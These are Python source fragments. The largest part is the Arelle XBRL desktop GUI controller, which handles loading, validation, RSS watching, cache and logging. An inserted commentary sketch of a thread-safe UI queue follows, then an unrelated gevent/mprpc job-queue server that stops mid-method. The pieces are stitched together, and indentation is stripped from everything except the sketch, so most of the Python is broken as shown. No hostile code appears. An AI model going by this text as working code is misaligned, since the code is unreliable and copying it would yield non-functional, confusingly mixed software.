thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,False,False))
thread.daemon = True
thread.start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url, isSupplemental=importToDTS)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"))
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
if modelXbrl and modelXbrl.modelDocument:
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs"),
(action, statTime)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs"),
(action, time.time() - startedAt)))
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
try:
if attach:
modelXbrl.closeViews()
self.parent.title(_("arelle - {0}").format(
os.path.basename(modelXbrl.modelDocument.uri)))
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table index view"
firstTableLinkroleURI, indexLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl)
if firstTableLinkroleURI:
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang, linkrole=indexLinkroleURI,
treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
currentAction = "tree view of tests"
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if not modelXbrl.hasTableRendering: # table view only if not grid rendered view
ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
currentAction = "dimensions relationships view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
currentAction = "property grid"
ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
self.modelManager.close()
self.parent.title(_("arelle - Unnamed"))
self.setValidateTooltipText()
self.currentView = None
def validate(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
thread = threading.Thread(target=lambda: self.backgroundValidate())
thread.daemon = True
thread.start()
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.modelManager.modelXbrl
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate()
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt))
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
thread = threading.Thread(target=lambda: self.backgroundCompareDTSes(versReportFile))
thread.daemon = True
thread.start()
def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
self.listbox.size(),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
thread = threading.Thread(target=lambda: backgroundClearCache())
thread.daemon = True
thread.start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def setShowDebugMessages(self, *args):
self.config["showDebugMessages"] = self.showDebugMessages.get()
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
from lxml import etree
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} {1}bit {2}\n"
"An open source XBRL platform\n"
"\u00a9 2010-2015 Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2013 Python Software Foundation"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"\n xlrd \u00a9 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2001 D. Giffin, \u00a9 2000 A. Khan"
"\n xlwt \u00a9 2007 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2005 R. V. Kiseliov"
"{3}"
"\n May include installable plug-in modules with author-specific license terms"
)
.format(self.__version__, self.systemWordSize, Version.version,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp") if self.hasWebServer else "",
sys.version_info, etree.LXML_VERSION))
# worker threads addToLog
def addToLog(self, message, messageCode="", messageArgs=None, file="", refs=[], level=logging.INFO):
if level == logging.DEBUG and not self.showDebugMessages.get():
return
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if refs:
message += " - " + Cntlr.logRefsFileLines(refs)
elif file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
message = message % messageArgs
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
        return True
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
if self.isMac:
return multFileNames
return re.findall("[{]([^}]+)[}]", # multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
from arelle import DialogFormulaParameters
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg, level=logRecord.levelno)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
global restartMain
while restartMain:
restartMain = False
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelle"):
# not built app - launches behind python or eclipse
application.lift()
application.call('wm', 'attributes', '.', '-topmost', True)
cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
application.mainloop()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
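# --- Illustrative sketch (editor's addition, not part of CntlrWinMain) ---
# The controller above never touches Tk widgets from worker threads; workers post
# (callback, args) tuples onto uiThreadQueue and uiThreadChecker drains them on the
# main thread via widget.after(). A minimal self-contained sketch of that pattern,
# using only the standard library (all names below are illustrative):
import queue
import threading
import time
import tkinter

def demo_ui_thread_queue():
    ui_queue = queue.Queue()
    root = tkinter.Tk()
    label = tkinter.Label(root, text="working...")
    label.pack()

    def ui_checker(delay_msecs=100):
        # Runs on the Tk main thread only; executes callbacks posted by workers.
        while not ui_queue.empty():
            try:
                callback, args = ui_queue.get(block=False)
            except queue.Empty:
                break
            callback(*args)
        root.after(delay_msecs, ui_checker)

    def worker():
        time.sleep(1)  # simulate background work (e.g. loading a model)
        # Never call label.config() here; hand the update to the UI thread instead.
        ui_queue.put((lambda msg: label.config(text=msg), ["done"]))

    threading.Thread(target=worker, daemon=True).start()
    ui_checker()
    root.mainloop()

# demo_ui_thread_queue()   # uncomment to run the sketch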
|
server.py
|
import logging
import threading
import queue
import sys
import pickle
import os
import signal
from gevent.server import StreamServer
import FetchAgent.MessageProcessor
import traceback
import logSetup
import mprpc
import gevent.monkey
import gevent
# from graphitesend import graphitesend
import statsd
import settings
import time
# import rpyc
# rpyc.core.protocol.DEFAULT_CONFIG['allow_pickle'] = True
# from rpyc.utils.server import ThreadPoolServer
INTERRUPTS = 0
TO_EXIT = []
def build_mprpc_handler(server):
global TO_EXIT
TO_EXIT.append(server)
def handler(signum=-1, frame=None):
global INTERRUPTS
INTERRUPTS += 1
print('Signal handler called with signal %s for the %s time' % (signum, INTERRUPTS))
if INTERRUPTS > 2:
print("Raising due to repeat interrupts")
raise KeyboardInterrupt
for server in TO_EXIT:
server.close()
return handler
def base_abort():
print("Low level keyboard interrupt")
for server in TO_EXIT:
server.close()
class FetchInterfaceClass(mprpc.RPCServer):
def __init__(self, interface_dict, rpc_prefix):
mp_conf = {"use_bin_type":True}
super().__init__(
pack_params = {
"use_bin_type":True
},
# unpack_param = {
# 'raw' : True,
# 'max_buffer_size' : sys.maxint,
# 'max_str_len' : sys.maxint,
# 'max_bin_len' : sys.maxint,
# 'max_array_len' : sys.maxint,
# 'max_map_len' : sys.maxint,
# 'max_ext_len' : sys.maxint,
# },
)
self.log = logging.getLogger("Main.{}-Interface".format(rpc_prefix))
self.mdict = interface_dict
self.log.info("Connection")
def __check_have_queue(self, queuename):
if not queuename in self.mdict['outq']:
with self.mdict['qlock']:
self.mdict['outq'][queuename] = queue.Queue()
self.mdict['inq'][queuename] = queue.Queue()
def __check_rss_queue(self, queuename):
if not queuename in self.mdict['feed_outq']:
with self.mdict['qlock']:
self.mdict['feed_outq'][queuename] = queue.Queue()
self.mdict['feed_inq'][queuename] = queue.Queue()
def putJob(self, queuename, job):
self.__check_have_queue(queuename)
self.log.info("Putting item in queue %s with size: %s (Queue size: %s)!", queuename, len(job), self.mdict['outq'][queuename].qsize())
self.mdict['outq'][queuename].put(job)
def getJob(self, queuename):
self.__check_have_queue(queuename)
self.log.info("Get job call for '%s' -> %s", queuename, self.mdict['inq'][queuename].qsize())
try:
tmp = self.mdict['inq'][queuename].get_nowait()
return tmp
except queue.Empty:
return None
def getJobNoWait(self, queuename):
self.__check_have_queue(queuename)
self.log.info("Get job call for '%s' -> %s", queuename, self.mdict['inq'][queuename].qsize())
try:
return self.mdict['inq'][queuename].get_nowait()
except queue.Empty:
return None
def putRss(self, message):
feed_q_name = 'rss_queue'
self.__check_rss_queue(feed_q_name)
self.log.info("Putting rss item with size: %s (qsize: %s)!", len(message), self.mdict['feed_outq'][feed_q_name].qsize())
self.mdict['feed_outq'][feed_q_name].put(message)
def putManyRss(self, messages):
feed_q_name = 'rss_queue'
self.__check_rss_queue(feed_q_name)
for message in messages:
self.log.info("Putting rss item with size: %s!", len(message))
self.mdict['feed_outq'][feed_q_name].put(message)
def getRss(self):
feed_q_name = 'rss_queue'
self.__check_rss_queue(feed_q_name)
self.log.info("Get job call for rss queue -> %s", self.mdict['feed_inq'][feed_q_name].qsize())
